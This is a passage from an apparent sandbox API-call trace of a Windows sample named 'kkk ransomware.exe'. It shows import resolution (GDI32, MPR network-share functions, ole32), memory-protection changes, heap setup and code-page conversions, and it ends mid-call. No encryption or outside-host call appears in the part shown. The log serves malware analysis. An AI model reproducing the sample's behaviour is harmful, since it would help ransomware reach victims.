(hModule=0x73fb0000, lpProcName="ImageList_ReplaceIcon") returned 0x74004dc0 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_Create") returned 0x73ffba00 [0077.838] GetProcAddress (hModule=0x73fb0000, lpProcName="InitCommonControlsEx") returned 0x7402a480 [0077.839] GetProcAddress (hModule=0x73fb0000, lpProcName="ImageList_Destroy") returned 0x73ffb8f0 [0077.839] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74540000 [0077.840] GetProcAddress (hModule=0x74540000, lpProcName="GetSaveFileNameW") returned 0x7459fa40 [0077.840] GetProcAddress (hModule=0x74540000, lpProcName="GetOpenFileNameW") returned 0x7459f970 [0077.840] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76920000 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="DeleteObject") returned 0x769252b0 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="AngleArc") returned 0x76928890 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="GetTextExtentPoint32W") returned 0x76923440 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="ExtCreatePen") returned 0x76929d30 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="StrokeAndFillPath") returned 0x7692b970 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="StrokePath") returned 0x7692d100 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="EndPath") returned 0x76924640 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="SetPixel") returned 0x76924fd0 [0077.840] GetProcAddress (hModule=0x76920000, lpProcName="CloseFigure") returned 0x76924be0 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="CreateCompatibleBitmap") returned 0x742a05f0 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="CreateCompatibleDC") returned 0x742a0720 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="SelectObject") returned 0x76926460 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="StretchBlt") returned 0x76923810 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="GetDIBits") returned 0x76926680 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="GetDeviceCaps") returned 0x742a0060 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="MoveToEx") returned 0x76923730 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="DeleteDC") returned 0x76925870 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="GetPixel") returned 0x769248b0 [0077.841] GetProcAddress (hModule=0x76920000, lpProcName="CreateDCW") returned 0x742a2290 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="Ellipse") returned 0x7692cb40 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="PolyDraw") returned 0x7692cf60 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="BeginPath") returned 0x76924670 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="Rectangle") returned 0x769242a0 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="SetViewportOrgEx") returned 0x769239b0 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="GetObjectW") returned 0x76926d60 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="SetBkMode") returned 0x76926560 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="RoundRect") returned 0x7692d040 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="SetBkColor") returned 0x76926520 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="CreatePen") returned 0x76924110 [0077.842] GetProcAddress (hModule=0x76920000, lpProcName="CreateSolidBrush") returned 0x76926860 [0077.843] GetProcAddress (hModule=0x76920000, lpProcName="SetTextColor") returned 0x76926490 [0077.843] GetProcAddress (hModule=0x76920000, lpProcName="CreateFontW") returned 0x769273c0 [0077.843] GetProcAddress (hModule=0x76920000, lpProcName="GetTextFaceW") returned 0x76927590 [0077.843] GetProcAddress (hModule=0x76920000, lpProcName="GetStockObject") returned 0x769266c0 [0077.843] GetProcAddress (hModule=0x76920000, lpProcName="LineTo") returned 0x76923ec0 [0077.843] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x73f90000 [0077.843] GetProcAddress (hModule=0x73f90000, lpProcName="WNetCancelConnection2W") returned 0x73f93cd0 [0077.843] GetProcAddress (hModule=0x73f90000, lpProcName="WNetGetConnectionW") returned 0x73f934e0 [0077.843] GetProcAddress (hModule=0x73f90000, lpProcName="WNetAddConnection2W") returned 0x73f93740 [0077.843] GetProcAddress (hModule=0x73f90000, lpProcName="WNetUseConnectionW") returned 0x73f9a790 [0077.843] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76470000 [0077.844] GetProcAddress (hModule=0x76470000, lpProcName="OleSetMenuDescriptor") returned 0x764fe650 [0077.844] GetProcAddress (hModule=0x76470000, lpProcName="MkParseDisplayName") returned 0x7649ffb0 [0077.844] GetProcAddress (hModule=0x76470000, lpProcName="OleSetContainedObject") returned 0x764e6600 [0077.844] GetProcAddress (hModule=0x76470000, lpProcName="CLSIDFromString") returned 0x771a88d0 [0077.845] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x8cff60 | out: lpflOldProtect=0x8cff60*=0x2) returned 1 [0077.947] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x8cff60 | out: lpflOldProtect=0x8cff60*=0x4) returned 1 [0077.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cff74 | out: lpSystemTimeAsFileTime=0x8cff74*(dwLowDateTime=0x2c0d631c, dwHighDateTime=0x1d5dff9)) [0077.954] GetCurrentProcessId () returned 0x12b4 [0077.954] GetCurrentThreadId () returned 0xf44 [0077.954] GetTickCount () returned 0x11545df [0077.954] QueryPerformanceCounter (in: lpPerformanceCount=0x8cff6c | out: lpPerformanceCount=0x8cff6c*=17139352796) returned 1 [0077.954] GetStartupInfoW (in: lpStartupInfo=0x8cff18 | out: lpStartupInfo=0x8cff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0077.955] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2af0000 [0078.066] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76750000 [0078.066] GetProcAddress (hModule=0x76750000, lpProcName="FlsAlloc") returned 0x76764ae0 [0078.066] GetProcAddress (hModule=0x76750000, lpProcName="FlsGetValue") returned 0x76764b20 [0078.066] GetProcAddress (hModule=0x76750000, lpProcName="FlsSetValue") returned 0x76764b40 [0078.066] GetProcAddress (hModule=0x76750000, lpProcName="FlsFree") returned 0x76764b00 [0078.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x214) returned 0x2af05a8 [0078.068] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76750000 [0078.068] GetCurrentThreadId () returned 0xf44 [0078.069] GetStartupInfoW (in: lpStartupInfo=0x8cfeb4 | out: lpStartupInfo=0x8cfeb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0078.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x800) returned 0x2af07c8 [0078.069] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0078.069] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0078.069] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0078.069] SetHandleCount (uNumber=0x20) returned 0x20 [0078.069] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe\" " [0078.069] GetEnvironmentStringsW () returned 0x995598* [0078.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xaca) returned 0x2af0fd0 [0078.145] FreeEnvironmentStringsW (penv=0x995598) returned 1 [0078.145] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x496f38, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\kkk ransomware.exe")) returned 0x35 [0078.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x74) returned 0x2af1aa8 [0078.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x94) returned 0x2af1b28 [0078.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x3e) returned 0x2af1bc8 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x50) returned 0x2af1c10 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x6e) returned 0x2af1c68 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x78) returned 0x2af1ce0 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x62) returned 0x2af1d60 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x28) returned 0x2af1dd0 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x48) returned 0x2af1e00 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1a) returned 0x2af1e50 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x2e) returned 0x2af1e78 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x56) returned 0x2af1eb0 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x2a) returned 0x2af1f10 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x2e) returned 0x2af1f48 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x44) returned 0x2af1f80 [0078.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1c) returned 0x2af1fd0 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x182) returned 0x2af1ff8 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x7c) returned 0x2af2188 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x36) returned 0x2af2210 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x3a) returned 0x2af2250 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x90) returned 0x2af2298 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x24) returned 0x2af2330 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x30) returned 0x2af2360 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x36) returned 0x2af2398 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x48) returned 0x2af23d8 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x52) returned 0x2af2428 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x3c) returned 0x2af2488 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0xd6) returned 0x2af24d0 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x2e) returned 0x2af25b0 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af25e8 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x2c) returned 0x2af2610 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x50) returned 0x2af2648 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x4e) returned 0x2af26a0 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x24) returned 0x2af26f8 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x42) returned 0x2af2728 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x20) returned 0x2af2778 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x38) returned 0x2af27a0 [0078.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x24) returned 0x2af27e0 [0078.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0fd0 | out: hHeap=0x2af0000) returned 1 [0078.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x80) returned 0x2af2810 [0078.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x800) returned 0x2af0fd0 [0078.177] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] GetACP () returned 0x4e4 [0078.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x220) returned 0x2af17d8 [0078.177] GetLastError () returned 0x0 [0078.177] SetLastError (dwErrCode=0x0) [0078.177] IsValidCodePage (CodePage=0x4e4) returned 1 [0078.177] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8cfe7c | out: lpCPInfo=0x8cfe7c) returned 1 [0078.178] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8cf948 | out: lpCPInfo=0x8cf948) returned 1 [0078.178] GetLastError () returned 0x0 [0078.178] SetLastError (dwErrCode=0x0) [0078.179] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.180] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x8cf6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0078.180] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x8cf95c | out: lpCharType=0x8cf95c) returned 1 [0078.181] GetLastError () returned 0x0 [0078.181] SetLastError (dwErrCode=0x0) [0078.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x8cf698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0078.181] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0078.181] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x8cf488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0078.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x8cfc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿuÞÔÑ\x94þ\x8c", lpUsedDefaultChar=0x0) returned 256 [0078.181] GetLastError () returned 0x0 [0078.181] SetLastError (dwErrCode=0x0) [0078.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8cfd5c, cbMultiByte=256, lpWideCharStr=0x8cf6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0078.181] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0078.181] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x8cf4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0078.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x8cfb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f 